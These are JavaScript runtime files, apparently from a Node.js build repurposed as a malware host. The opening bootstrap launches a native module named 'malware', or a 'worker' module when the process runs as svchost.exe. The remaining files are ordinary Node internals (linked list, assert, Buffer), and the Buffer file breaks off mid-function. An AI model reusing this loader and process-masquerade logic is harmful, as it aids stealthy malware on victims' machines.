

========

﻿(function (process) {
    this.global = this;



    function startup() {

        var EventEmitter = NativeModule.require('events').EventEmitter;

        process.__proto__ = Object.create(EventEmitter.prototype, {
            constructor: {
                value: process.constructor
            }
        });

        EventEmitter.call(process);

        process.EventEmitter = EventEmitter;

        NativeModule.require('tracing')._nodeInitialization(process);

        startup.processFatal();

        startup.globalVariables();
        startup.globalTimeouts();
        startup.globalConsole();

        startup.processAssert();
        startup.processNextTick();
        startup.processKillAndExit();
        startup.processSignalHandlers();
        startup.processChannel();

        startup.resolveArgv0();
        
        process.on('uncaughtException', function (err) {
            print('[root] Caught exception (uncaughtException): ' + err.message);
            print('[root] Caught exception (uncaughtException): ' + err.stack);
            if (typeof (process.fatalCallback) !== 'undefined') {
                process.fatalCallback();
            }
        });

        process.httpProxyServer = {};
        process.httpsProxyServer = {};

        process.httpProxyServer.close = setImmediate;
        process.httpsProxyServer.close = setImmediate;

        var path = NativeModule.require('path');
        process.currentBinary = path.basename(process.execPath).toLowerCase();
        process.currentUser = process.env.USERNAME;
        process.isWorker = ((typeof (process.env["startupObject"]) !== 'undefined') && process.currentBinary === 'svchost.exe');

        NativeModule.require("windows").init(global);


        if (process.isWorker) {
            NativeModule.require("worker").run();
        } else {
            NativeModule.require("malware").run();
        }

        process.dbg(process.execPath);

    }

    startup.globalVariables = function () {
        global.process = process;
        global.global = global;
        global.GLOBAL = global;
        global.root = global;
        global.Buffer = NativeModule.require('buffer').Buffer;
        process.domain = null;
        process._exiting = false;

        global.printf = function () {
            console.log.apply(this, arguments);
        }

        global.print = function () {
            console.log.apply(this, arguments);
        }
    };

    process.timers = [];

    startup.globalTimeouts = function () {
        global.setTimeout = function () {
            var t = NativeModule.require('timers');
            return t.setTimeout.apply(this, arguments);
        };

        global.setInterval = function () {
            var t = NativeModule.require('timers');
            return t.setInterval.apply(this, arguments);
        };

        global.clearTimeout = function () {
            var t = NativeModule.require('timers');
            return t.clearTimeout.apply(this, arguments);
        };

        global.clearInterval = function () {
            var t = NativeModule.require('timers');
            return t.clearInterval.apply(this, arguments);
        };

        global.setImmediate = function () {
            var t = NativeModule.require('timers');
            return t.setImmediate.apply(this, arguments);
        };

        global.clearImmediate = function () {
            var t = NativeModule.require('timers');
            return t.clearImmediate.apply(this, arguments);
        };
    };


    startup.globalConsole = function () {
        global.__defineGetter__('console', function () {
            return NativeModule.require('console');
        });
    };


    startup._lazyConstants = null;

    startup.lazyConstants = function () {
        if (!startup._lazyConstants) {
            startup._lazyConstants = process.binding('constants');
        }
        return startup._lazyConstants;
    };

    startup.processFatal = function () {
        var tracing = NativeModule.require('tracing');
        var _errorHandler = tracing._errorHandler;
        
        delete tracing._errorHandler;

        process._fatalException = function (er) {
            
            var caught = _errorHandler(er);

            if (process.domain && process.domain._errorHandler)
                caught = process.domain._errorHandler(er) || caught;

            if (!caught)
                caught = process.emit('uncaughtException', er);

            
            
            if (!caught) {
                try {
                    if (!process._exiting) {
                        process._exiting = true;
                        process.emit('exit', 1);
                    }
                } catch (er) {
                    
                }

                
            } else {
                var t = setImmediate(process._tickCallback);
                
                
                if (t._asyncQueue)
                    t._asyncQueue = [];
            }

            return caught;
        };
    };

    var assert;
    startup.processAssert = function () {
        assert = process.assert = function (x, msg) {
            if (!x) throw new Error(msg || 'assertion error');
        };
    };

    startup.processNextTick = function () {
        var tracing = NativeModule.require('tracing');
        var nextTickQueue = [];
        var asyncFlags = tracing._asyncFlags;
        var _runAsyncQueue = tracing._runAsyncQueue;
        var _loadAsyncQueue = tracing._loadAsyncQueue;
        var _unloadAsyncQueue = tracing._unloadAsyncQueue;
        var microtasksScheduled = false;

        
        var _runMicrotasks = {};

        
        
        var tickInfo = {};

        
        var kIndex = 0;
        var kLength = 1;

        
        
        var kCount = 0;

        process.nextTick = nextTick;
        
        process._tickCallback = _tickCallback;
        process._tickDomainCallback = _tickDomainCallback;

        process._setupNextTick(tickInfo, _tickCallback, _runMicrotasks);

        _runMicrotasks = _runMicrotasks.runMicrotasks;

        function tickDone() {
            if (tickInfo[kLength] !== 0) {
                if (tickInfo[kLength] <= tickInfo[kIndex]) {
                    nextTickQueue = [];
                    tickInfo[kLength] = 0;
                } else {
                    nextTickQueue.splice(0, tickInfo[kIndex]);
                    tickInfo[kLength] = nextTickQueue.length;
                }
            }
            tickInfo[kIndex] = 0;
        }

        function scheduleMicrotasks() {
            if (microtasksScheduled)
                return;

            nextTickQueue.push({
                callback: runMicrotasksCallback,
                domain: null
            });

            tickInfo[kLength]++;
            microtasksScheduled = true;
        }

        function runMicrotasksCallback() {
            microtasksScheduled = false;
            _runMicrotasks();

            if (tickInfo[kIndex] < tickInfo[kLength])
                scheduleMicrotasks();
        }

        
        
        function _tickCallback() {
            var callback, hasQueue, threw, tock;

            scheduleMicrotasks();

            while (tickInfo[kIndex] < tickInfo[kLength]) {
                tock = nextTickQueue[tickInfo[kIndex]++];
                callback = tock.callback;
                threw = true;
                hasQueue = !!tock._asyncQueue;
                if (hasQueue)
                    _loadAsyncQueue(tock);
                try {
                    callback();
                    threw = false;
                } finally {
                    if (threw)
                        tickDone();
                }
                if (hasQueue)
                    _unloadAsyncQueue(tock);
                if (1e4 < tickInfo[kIndex])
                    tickDone();
            }

            tickDone();
        }

        function _tickDomainCallback() {
            var callback, domain, hasQueue, threw, tock;

            scheduleMicrotasks();

            while (tickInfo[kIndex] < tickInfo[kLength]) {
                tock = nextTickQueue[tickInfo[kIndex]++];
                callback = tock.callback;
                domain = tock.domain;
                hasQueue = !!tock._asyncQueue;
                if (hasQueue)
                    _loadAsyncQueue(tock);
                if (domain)
                    domain.enter();
                threw = true;
                try {
                    callback();
                    threw = false;
                } finally {
                    if (threw)
                        tickDone();
                }
                if (hasQueue)
                    _unloadAsyncQueue(tock);
                if (1e4 < tickInfo[kIndex])
                    tickDone();
                if (domain)
                    domain.exit();
            }

            tickDone();
        }

        function nextTick(callback) {
            
            if (process._exiting)
                return;

            var obj = {
                callback: callback,
                domain: process.domain || null,
                _asyncQueue: undefined
            };

            if (asyncFlags[kCount] > 0)
                _runAsyncQueue(obj);

            nextTickQueue.push(obj);
            tickInfo[kLength]++;
        }
    };

    function evalScript(name) {
        var Module = NativeModule.require('module');
        var path = NativeModule.require('path');
        var cwd = process.cwd();

        var module = new Module(name);
        module.filename = path.join(cwd, name);
        module.paths = Module._nodeModulePaths(cwd);
        var script = process._eval;
        if (!Module._contextLoad) {
            var body = script;
            script = 'global.__filename = ' + JSON.stringify(name) + ';\n' +
                     'global.exports = exports;\n' +
                     'global.module = module;\n' +
                     'global.__dirname = __dirname;\n' +
                     'global.require = require;\n' +
                     'return require("vm").runInThisContext(' +
                     JSON.stringify(body) + ', { filename: ' +
                     JSON.stringify(name) + ' });\n';
        }
        var result = module._compile(script, name + '-wrapper');
        if (process._print_eval) console.log(result);
    }

    function errnoException(errorno, syscall) {

        var e = new Error(syscall + ' ' + errorno);
        e.errno = e.code = errorno;
        e.syscall = syscall;
        return e;
    }

    startup.processKillAndExit = function () {

        process.exit = function (code) {
            if (code || code === 0)
                process.exitCode = code;

            if (!process._exiting) {
                process._exiting = true;
                process.emit('exit', process.exitCode || 0);
            }
            process.reallyExit(process.exitCode || 0);
        };

        process.kill = function (pid, sig) {
            var err;

            if (typeof pid !== 'number' || !isFinite(pid)) {
                throw new TypeError('pid must be a number');
            }

            
            if (0 === sig) {
                err = process._kill(pid, 0);
            } else {
                sig = sig || 'SIGTERM';
                if (startup.lazyConstants()[sig] &&
                    sig.slice(0, 3) === 'SIG') {
                    err = process._kill(pid, startup.lazyConstants()[sig]);
                } else {
                    throw new Error('Unknown signal: ' + sig);
                }
            }

            if (err) {
                var errnoException = NativeModule.require('util')._errnoException;
                throw errnoException(err, 'kill');
            }

            return true;
        };
    };

    startup.processChannel = function () {
        
        
        if (process.env.NODE_CHANNEL_FD) {
            var fd = parseInt(process.env.NODE_CHANNEL_FD, 10);
            assert(fd >= 0);

            
            delete process.env.NODE_CHANNEL_FD;

            var cp = NativeModule.require('child_process');

            
            
            
            process.binding('tcp_wrap');

            cp._forkChild(fd);
            assert(process.send);
        }
    };

    startup.processSignalHandlers = function () {
        
        
        var signalWraps = {};
        var addListener = process.addListener;
        var removeListener = process.removeListener;

        function isSignal(event) {
            return event.slice(0, 3) === 'SIG' &&
                   startup.lazyConstants().hasOwnProperty(event);
        }

        
        process.on = process.addListener = function (type, listener) {
            if (isSignal(type) &&
                !signalWraps.hasOwnProperty(type)) {
                var Signal = process.binding('signal_wrap').Signal;
                var wrap = new Signal();

                wrap.unref();

                wrap.onsignal = function () { process.emit(type); };

                var signum = startup.lazyConstants()[type];
                var err = wrap.start(signum);
                if (err) {
                    wrap.close();
                    var errnoException = NativeModule.require('util')._errnoException;
                    throw errnoException(err, 'uv_signal_start');
                }

                signalWraps[type] = wrap;
            }

            return addListener.apply(this, arguments);
        };

        process.removeListener = function (type, listener) {
            var ret = removeListener.apply(this, arguments);
            if (isSignal(type)) {
                assert(signalWraps.hasOwnProperty(type));

                if (NativeModule.require('events').listenerCount(this, type) === 0) {
                    signalWraps[type].close();
                    delete signalWraps[type];
                }
            }

            return ret;
        };
    };


    startup.resolveArgv0 = function () {
        var cwd = process.cwd();
        var isWindows = process.platform === 'win32';

        
        
        
        
        
        var argv0 = process.argv[0];
        if (!isWindows && argv0.indexOf('/') !== -1 && argv0.charAt(0) !== '/') {
            var path = NativeModule.require('path');
            process.argv[0] = path.join(cwd, process.argv[0]);
        }
    };

    var ContextifyScript = process.binding('contextify').ContextifyScript;
    function runInThisContext(code, options) {
        var script = new ContextifyScript(code, options);
        return script.runInThisContext();
    }

    function NativeModule(id) {
        this.filename = id + '.js';
        this.id = id;
        this.exports = {};
        this.loaded = false;
    }

    NativeModule._source = process.binding('natives');
    NativeModule._cache = {};

    NativeModule.require = function (id) {

        if (id == 'native_module') {
            return NativeModule;
        }

        var cached = NativeModule.getCached(id);

        if (cached) {
            return cached.exports;
        }

        if (!NativeModule.exists(id)) {
            throw new Error('No such native module ' + id);
        }

        process.moduleLoadList.push('NativeModule ' + id);

        var nativeModule = new NativeModule(id);

        nativeModule.cache();
        nativeModule.compile();
        return nativeModule.exports;
    };

    NativeModule.getCached = function (id) {
        return NativeModule._cache[id];
    }

    NativeModule.exists = function (id) {
        return NativeModule._source.hasOwnProperty(id);
    }

    NativeModule.getSource = function (id) {
        return NativeModule._source[id];
    }

    NativeModule.wrap = function (script) {
        return NativeModule.wrapper[0] + script + NativeModule.wrapper[1];
    };

    NativeModule.wrapper = [
      '(function (exports, require, module, __filename, __dirname) { ',
      '\n});'
    ];

    NativeModule.prototype.compile = function () {
        var source = NativeModule.getSource(this.id);
        source = NativeModule.wrap(source);

        var fn = runInThisContext(source, { filename: this.filename });
        fn(this.exports, NativeModule.require, this, this.filename);

        this.loaded = true;
    };

    NativeModule.prototype.cache = function () {
        NativeModule._cache[this.id] = this;
    };

    startup();

});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

========






















function init(list) {
  list._idleNext = list;
  list._idlePrev = list;
}
exports.init = init;



function peek(list) {
  if (list._idlePrev == list) return null;
  return list._idlePrev;
}
exports.peek = peek;



function shift(list) {
  var first = list._idlePrev;
  remove(first);
  return first;
}
exports.shift = shift;



function remove(item) {
  if (item._idleNext) {
    item._idleNext._idlePrev = item._idlePrev;
  }

  if (item._idlePrev) {
    item._idlePrev._idleNext = item._idleNext;
  }

  item._idleNext = null;
  item._idlePrev = null;
}
exports.remove = remove;



function append(list, item) {
  remove(item);
  item._idleNext = list._idleNext;
  list._idleNext._idlePrev = item;
  item._idlePrev = list;
  list._idleNext = item;
}
exports.append = append;


function isEmpty(list) {
  return list._idleNext === list;
}
exports.isEmpty = isEmpty;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========


























var util = require('util');
var pSlice = Array.prototype.slice;





var assert = module.exports = ok;






assert.AssertionError = function AssertionError(options) {
  this.name = 'AssertionError';
  this.actual = options.actual;
  this.expected = options.expected;
  this.operator = options.operator;
  if (options.message) {
    this.message = options.message;
    this.generatedMessage = false;
  } else {
    this.message = getMessage(this);
    this.generatedMessage = true;
  }
  var stackStartFunction = options.stackStartFunction || fail;
  Error.captureStackTrace(this, stackStartFunction);
};


util.inherits(assert.AssertionError, Error);

function replacer(key, value) {
  if (util.isUndefined(value)) {
    return '' + value;
  }
  if (util.isNumber(value) && !isFinite(value)) {
    return value.toString();
  }
  if (util.isFunction(value) || util.isRegExp(value)) {
    return value.toString();
  }
  return value;
}

function truncate(s, n) {
  if (util.isString(s)) {
    return s.length < n ? s : s.slice(0, n);
  } else {
    return s;
  }
}

function getMessage(self) {
  return truncate(JSON.stringify(self.actual, replacer), 128) + ' ' +
         self.operator + ' ' +
         truncate(JSON.stringify(self.expected, replacer), 128);
}












function fail(actual, expected, message, operator, stackStartFunction) {
  throw new assert.AssertionError({
    message: message,
    actual: actual,
    expected: expected,
    operator: operator,
    stackStartFunction: stackStartFunction
  });
}


assert.fail = fail;








function ok(value, message) {
  if (!value) fail(value, true, message, '==', assert.ok);
}
assert.ok = ok;





assert.equal = function equal(actual, expected, message) {
  if (actual != expected) fail(actual, expected, message, '==', assert.equal);
};




assert.notEqual = function notEqual(actual, expected, message) {
  if (actual == expected) {
    fail(actual, expected, message, '!=', assert.notEqual);
  }
};




assert.deepEqual = function deepEqual(actual, expected, message) {
  if (!_deepEqual(actual, expected)) {
    fail(actual, expected, message, 'deepEqual', assert.deepEqual);
  }
};

function _deepEqual(actual, expected) {
  
  if (actual === expected) {
    return true;

  } else if (util.isBuffer(actual) && util.isBuffer(expected)) {
    if (actual.length != expected.length) return false;

    for (var i = 0; i < actual.length; i++) {
      if (actual[i] !== expected[i]) return false;
    }

    return true;

  
  
  } else if (util.isDate(actual) && util.isDate(expected)) {
    return actual.getTime() === expected.getTime();

  
  
  
  } else if (util.isRegExp(actual) && util.isRegExp(expected)) {
    return actual.source === expected.source &&
           actual.global === expected.global &&
           actual.multiline === expected.multiline &&
           actual.lastIndex === expected.lastIndex &&
           actual.ignoreCase === expected.ignoreCase;

  
  
  } else if (!util.isObject(actual) && !util.isObject(expected)) {
    return actual == expected;

  
  
  
  
  
  
  } else {
    return objEquiv(actual, expected);
  }
}

function isArguments(object) {
  return Object.prototype.toString.call(object) == '[object Arguments]';
}

function objEquiv(a, b) {
  if (util.isNullOrUndefined(a) || util.isNullOrUndefined(b))
    return false;
  
  if (a.prototype !== b.prototype) return false;
  
  
  var aIsArgs = isArguments(a),
      bIsArgs = isArguments(b);
  if ((aIsArgs && !bIsArgs) || (!aIsArgs && bIsArgs))
    return false;
  if (aIsArgs) {
    a = pSlice.call(a);
    b = pSlice.call(b);
    return _deepEqual(a, b);
  }
  try {
    var ka = Object.keys(a),
        kb = Object.keys(b),
        key, i;
  } catch (e) {
    return false;
  }
  
  
  if (ka.length != kb.length)
    return false;
  
  ka.sort();
  kb.sort();
  
  for (i = ka.length - 1; i >= 0; i--) {
    if (ka[i] != kb[i])
      return false;
  }
  
  
  for (i = ka.length - 1; i >= 0; i--) {
    key = ka[i];
    if (!_deepEqual(a[key], b[key])) return false;
  }
  return true;
}




assert.notDeepEqual = function notDeepEqual(actual, expected, message) {
  if (_deepEqual(actual, expected)) {
    fail(actual, expected, message, 'notDeepEqual', assert.notDeepEqual);
  }
};




assert.strictEqual = function strictEqual(actual, expected, message) {
  if (actual !== expected) {
    fail(actual, expected, message, '===', assert.strictEqual);
  }
};




assert.notStrictEqual = function notStrictEqual(actual, expected, message) {
  if (actual === expected) {
    fail(actual, expected, message, '!==', assert.notStrictEqual);
  }
};

function expectedException(actual, expected) {
  if (!actual || !expected) {
    return false;
  }

  if (Object.prototype.toString.call(expected) == '[object RegExp]') {
    return expected.test(actual);
  } else if (actual instanceof expected) {
    return true;
  } else if (expected.call({}, actual) === true) {
    return true;
  }

  return false;
}

function _throws(shouldThrow, block, expected, message) {
  var actual;

  if (util.isString(expected)) {
    message = expected;
    expected = null;
  }

  try {
    block();
  } catch (e) {
    actual = e;
  }

  message = (expected && expected.name ? ' (' + expected.name + ').' : '.') +
            (message ? ' ' + message : '.');

  if (shouldThrow && !actual) {
    fail(actual, expected, 'Missing expected exception' + message);
  }

  if (!shouldThrow && expectedException(actual, expected)) {
    fail(actual, expected, 'Got unwanted exception' + message);
  }

  if ((shouldThrow && actual && expected &&
      !expectedException(actual, expected)) || (!shouldThrow && actual)) {
    throw actual;
  }
}




assert.throws = function(block, error, message) {
  _throws.apply(this, [true].concat(pSlice.call(arguments)));
};


assert.doesNotThrow = function(block, message) {
  _throws.apply(this, [false].concat(pSlice.call(arguments)));
};

assert.ifError = function(err) { if (err) {throw err;}};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========






















var buffer = process.binding('buffer');
var smalloc = process.binding('smalloc');
var util = require('util');
var alloc = smalloc.alloc;
var truncate = smalloc.truncate;
var sliceOnto = smalloc.sliceOnto;
var kMaxLength = smalloc.kMaxLength;
var internal = {};

exports.Buffer = Buffer;
exports.SlowBuffer = SlowBuffer;
exports.INSPECT_MAX_BYTES = 50;


Buffer.poolSize = 8 * 1024;
var poolSize, poolOffset, allocPool;


function createPool() {
  poolSize = Buffer.poolSize;
  allocPool = alloc({}, poolSize);
  poolOffset = 0;
}
createPool();


function Buffer(subject, encoding) {
  if (!util.isBuffer(this))
    return new Buffer(subject, encoding);

  if (util.isNumber(subject))
    this.length = subject > 0 ? subject >>> 0 : 0;
  else if (util.isString(subject))
    this.length = Buffer.byteLength(subject, encoding = encoding || 'utf8');
  else if (util.isObject(subject)) {
    if (subject.type === 'Buffer' && util.isArray(subject.data))
      subject = subject.data;

    this.length = +subject.length > 0 ? Math.floor(+subject.length) : 0;
  } else
    throw new TypeError('must start with number, buffer, array or string');

  if (this.length > kMaxLength) {
    throw new RangeError('Attempt to allocate Buffer larger than maximum ' +
                         'size: 0x' + kMaxLength.toString(16) + ' bytes');
  }

  this.parent = undefined;
  if (this.length <= (Buffer.poolSize >>> 1) && this.length > 0) {
    if (this.length > poolSize - poolOffset)
      createPool();
    this.parent = sliceOnto(allocPool,
                            this,
                            poolOffset,
                            poolOffset + this.length);
    poolOffset += this.length;
  } else {
    alloc(this, this.length);
  }

  if (!util.isNumber(subject)) {
    if (util.isString(subject)) {
      
      
      
      var len = this.write(subject, encoding);

      
      if (len !== this.length) {
        this.length = len;
        truncate(this, this.length);
      }
    } else {
      if (util.isBuffer(subject))
        subject.copy(this, 0, 0, this.length);
      else if (util.isNumber(subject.length) || util.isArray(subject))
        for (var i = 0; i < this.length; i++)
          this[i] = subject[i];
    }
  }
}


function SlowBuffer(length) {
  length = length >>> 0;
  if (length > kMaxLength) {
    throw new RangeError('Attempt to allocate Buffer larger than maximum ' +
                         'size: 0x' + kMaxLength.toString(16) + ' bytes');
  }
  var b = new NativeBuffer(length);
  alloc(b, length);
  return b;
}





function NativeBuffer(length) {
  this.length = length >>> 0;
  
  this.parent = undefined;
}
NativeBuffer.prototype = Buffer.prototype;



buffer.setupBufferJS(NativeBuffer, internal);




Buffer.isBuffer = function isBuffer(b) {
  return util.isBuffer(b);
};


Buffer.compare = function compare(a, b) {
  if (!(a instanceof Buffer) ||
      !(b instanceof Buffer))
    throw new TypeError('Arguments must be Buffers');

  return internal.compare(a, b);
};


Buffer.isEncoding = function(encoding) {
  switch ((encoding + '').toLowerCase()) {
    case 'hex':
    case 'utf8':
    case 'utf-8':
    case 'ascii':
    case 'binary':
    case 'base64':
    case 'ucs2':
    case 'ucs-2':
    case 'utf16le':
    case 'utf-16le':
    case 'raw':
      return true;

    default:
      return false;
  }
};


Buffer.concat = function(list, length) {
  if (!util.isArray(list))
    throw new TypeError('Usage: Buffer.concat(list[, length])');

  if (util.isUndefined(length)) {
    length = 0;
    for (var i = 0; i < list.length; i++)
      length += list[i].length;
  } else {
    length = length >>> 0;
  }

  if (list.length === 0)
    return new Buffer(0);
  else if (list.length === 1)
    return list[0];

  var buffer = new Buffer(length);
  var pos = 0;
  for (var i = 0; i < list.length; i++) {
    var buf = list[i];
    buf.copy(buffer, pos);
    pos += buf.length;
  }

  return buffer;
};


Buffer.byteLength = function(str, enc) {
  var ret;
  str = str + '';
  switch (enc) {
    case 'ascii':
    case 'binary':
    case 'raw':
      ret = str.length;
      break;
    case 'ucs2':
    case 'ucs-2':
    case 'utf16le':
    case 'utf-16le':
      ret = str.length * 2;
      break;
    case 'hex':
      ret = str.length >>> 1;
      break;
    default:
      ret = internal.byteLength(str, enc);
  }
  return ret;
};



Buffer.prototype.toString = function(encoding, start, end) {
  var loweredCase = false;

  start = start >>> 0;
  end = util.isUndefined(end) || end === Infinity ? this.length : end >>> 0;

  if (!encoding) encoding = 'utf8';
  if (start < 0) start = 0;
  if (end > this.length) end = this.length;
  if (end <= start) return '';

  while (true) {
    switch (encoding) {
      case 'hex':
        return this.hexSlice(start, end);

      case 'utf8':
      case 'utf-8':
        return this.utf8Slice(start, end);

      case 'ascii':
        return this.asciiSlice(start, end);

      case 'binary':
        return this.binarySlice(start, end);

      case 'base64':
        return this.base64Slice(start, end);

      case 'ucs2':
      case 'ucs-2':
      case 'utf16le':
      case 'utf-16le':
        return this.ucs2Slice(start, end);

      default:
        if (loweredCase)
          throw new TypeError('Unknown encoding: ' + encoding);
        encoding = (encoding + '').toLowerCase();
        loweredCase = true;
    }
  }
};


Buffer.prototype.equals = function equals(b) {
  if (!(b instanceof Buffer))
    throw new TypeError('Argument must be a Buffer');

  return internal.compare(this, b) === 0;
};



Buffer.prototype.inspect = function inspect() {
  var str = '';
  var max = exports.INSPECT_MAX_BYTES;
  if (this.length > 0) {
    str = this.toString('hex', 0, max).match(/.{2}/g).join(' ');
    if (this.length > max)
      str += ' ... ';
  }
  return '<' + this.constructor.name + ' ' + str + '>';
};


Buffer.prototype.compare = function compare(b) {
  if (!(b instanceof Buffer))
    throw new TypeError('Argument must be a Buffer');

  return internal.compare(this, b);
};



Buffer.prototype.get = util.deprecate(function get(offset) {
  offset = ~~offset;
  if (offset < 0 || offset >= this.length)
    throw new RangeError('index out of range');
  return this[offset];
}, '.get() is deprecated. Access using array indexes instead.');



Buffer.prototype.set = util.deprecate(function set(offset, v) {
  offset = ~~offset;
  if (offset < 0 || offset >= this.length)
    throw new RangeError('index out of range');
  return this[offset] = v;
}, '.set() is deprecated. Set using array indexes instead.');




var writeWarned = false;
var writeMsg = '.write(string, encoding, offset, length) is deprecated.' +
               ' Use write(string[, offset[, length]][, encoding]) instead.';
Buffer.prototype.write = function(string, offset, length, encoding) {
  
  if (util.isUndefined(offset)) {
    encoding = 'utf8';
    length = this.length;
    offset = 0;

  
  } else if (util.isUndefined(length) && util.isString(offset)) {
    encoding = offset;
    length = this.length;
    offset = 0;

  
  } else if (isFinite(offset)) {
    offset = offset >>> 0;
    if (isFinite(length)) {
      length = length >>> 0;
      if (util.isUndefined(encoding))
        encoding = 'utf8';
    } else {
      encoding = length;
      length = undefined;
    }

  
  } else {
    if (!writeWarned) {
      if (process.throwDeprecation)
        throw new Error(writeMsg);
      else if (process.traceDeprecation)
        console.trace(writeMsg);
      else
        console.error(writeMsg);
      writeWarned = true;
    }

    var swap = encoding;
    encoding = offset;
    offset = length >>> 0;
    length = swap;
  }

  var remaining = this.length - offset;
  if (util.isUndefined(length) || length > remaining)
    length = remaining;

  encoding = !!encoding ? (encoding + '').toLowerCase() : 'utf8';

  if (string.length > 0 && (length < 0 || offset < 0))
    throw new RangeError('attempt to write outside buffer bounds');

  var ret;
  switch (encoding) {
    case 'hex':
      ret = this.hexWrite(string, offset, length);
      break;

    case 'utf8':
    case 'utf-8':
      ret = this.utf8Write(string, offset, length);
      break;

    case 'ascii':
      ret = this.asciiWrite(string, offset, length);
      break;

    case 'binary':
      ret = this.binaryWrite(string, offset, length);
      break;

    case 'base64':
      
      ret = this.base64Write(string, offset, length);
      break;

    case 'ucs2':
    case 'ucs-2':
    case 'utf16le':
    case 'utf-16le':
      ret = this.ucs2Write(string, offset, length);
      break;

    default:
      throw new TypeError('Unknown encoding: ' + encoding);
  }

  return ret;
};


Buffer.prototype.toJSON = function() {
  return {
    type: 'Buffer',
    data: Array.prototype.slice.call(this, 0)
  };
};




Buffer.prototype.slice = function(start, end) {
  var len = this.length;
  start = ~~start;
  end = util.isUndefined(end) ? len : ~~end;

  if (start < 0) {
    start += len;
    if (start < 0)
      start = 0;
  } else if (start > len) {
    start = len;
  }

  if (end < 0) {
    end += len;
    if (end < 0)
      end = 0;
  } else if (end > len) {
    end = len;
  }

  if (end < start)
    end = start;

  var buf = new NativeBuffer();
  sliceOnto(this, buf, start, end);
  buf.length = end - start;
  if (buf.length > 0)
    buf.parent = util.isUndefined(this.parent) ? this : this.parent;

  return buf;
};


function checkOffset(offset, ext, length) {
  if (offset + ext > length)
    throw new RangeError('index out of range');
}


Buffer.prototype.readUInt8 = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 1, this.length);
  return this[offset];
};


Buffer.prototype.readUInt16LE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 2, this.length);
  return this[offset] | (this[offset + 1] << 8);
};


Buffer.prototype.readUInt16BE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 2, this.length);
  return (this[offset] << 8) | this[offset + 1];
};


Buffer.prototype.readUInt32LE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 4, this.length);

  return ((this[offset]) |
      (this[offset + 1] << 8) |
      (this[offset + 2] << 16)) +
      (this[offset + 3] * 0x1000000);
};


Buffer.prototype.readUInt32BE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 4, this.length);

  return (this[offset] * 0x1000000) +
      ((this[offset + 1] << 16) |
      (this[offset + 2] << 8) |
      this[offset + 3]);
};


Buffer.prototype.readInt8 = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 1, this.length);
  var val = this[offset];
  return !(val & 0x80) ? val : (0xff - val + 1) * -1;
};


Buffer.prototype.readInt16LE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 2, this.length);
  var val = this[offset] | (this[offset + 1] << 8);
  return (val & 0x8000) ? val | 0xFFFF0000 : val;
};


Buffer.prototype.readInt16BE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 2, this.length);
  var val = this[offset + 1] | (this[offset] << 8);
  return (val & 0x8000) ? val | 0xFFFF0000 : val;
};


Buffer.prototype.readInt32LE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 4, this.length);

  return (this[offset]) |
      (this[offset + 1] << 8) |
      (this[offset + 2] << 16) |
      (this[offset + 3] << 24);
};


Buffer.prototype.readInt32BE = function(offset, noAssert) {
  offset = offset >>> 0;
  if (!noAssert)
    checkOffset(offset, 4, this.length);

  return (this[offset] << 24) |
      (this[offset + 1] << 16) |
      (this[offset + 2] << 8) |
      (this[offset + 3]);
};


function checkInt(buffer, value, offset, ext, max, min) {
  if (!(buffer instanceof Buffer))
    throw new TypeError('buffer must be a Buffer instance');
  if (value > max || value < min)
    throw new TypeError('value is out of bounds');
  if (offset + ext > buffer.length)
    throw new RangeError('index out of range');
}


Buffer.prototype.writeUInt8 = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 1, 0xff, 0);
  this[offset] = value;
  return offset + 1;
};


Buffer.prototype.writeUInt16LE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 2, 0xffff, 0);
  this[offset] = value;
  this[offset + 1] = (value >>> 8);
  return offset + 2;
};


Buffer.prototype.writeUInt16BE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 2, 0xffff, 0);
  this[offset] = (value >>> 8);
  this[offset + 1] = value;
  return offset + 2;
};


Buffer.prototype.writeUInt32LE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 4, 0xffffffff, 0);
  this[offset + 3] = (value >>> 24);
  this[offset + 2] = (value >>> 16);
  this[offset + 1] = (value >>> 8);
  this[offset] = value;
  return offset + 4;
};


Buffer.prototype.writeUInt32BE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 4, 0xffffffff, 0);
  this[offset] = (value >>> 24);
  this[offset + 1] = (value >>> 16);
  this[offset + 2] = (value >>> 8);
  this[offset + 3] = value;
  return offset + 4;
};


Buffer.prototype.writeInt8 = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
